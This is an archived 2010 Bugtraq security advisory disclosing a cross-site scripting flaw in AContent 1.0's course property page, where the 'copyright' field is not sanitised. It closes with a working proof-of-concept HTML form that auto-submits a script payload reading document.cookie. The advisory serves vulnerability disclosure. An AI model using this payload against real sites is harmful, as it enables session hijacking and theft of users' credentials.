[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
XSS vulnerability in AContent
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: XSS vulnerability in AContent
- From: advisory@xxxxxxxxxxx
- Date: Wed, 15 Sep 2010 15:09:52 +0200 (CEST)
Vulnerability ID: HTB22598
Reference:
http://www.htbridge.ch/advisory/xss_vulnerability_in_acontent_course.html
Product: AContent
Vendor: Inclusive Design Institute ( http://www.atutor.ca/ )
Vulnerable Version: 1.0
Vendor Notification: 01 September 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing
(http://www.htbridge.ch/)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the
"home/course/course_property.php" script to properly sanitize user-supplied
input in "copyright" variable. Successful exploitation of this vulnerability
could result in a compromise of the application, theft of cookie-based
authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is
available:
<form action="http://host/home/course/course_property.php?_course_id=COURSE_ID";
method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="_course_id" value="COURSE_ID" />
<input type="hidden" name="title" value="Creating Lesson in AContent" />
<input type="hidden" name="category_id" value="0" />
<input type="hidden" name="pri_lang" value="en" />
<input type="hidden" name="description" value="Learn how to" />
<input type="hidden" name="copyright"
value='1"><script>alert(document.cookie)</script>' />
<input type="submit" name="submit" id="sbmtit" value="Save" />
</form>
<script>
document.getElementById('sbmtit').click();
</script>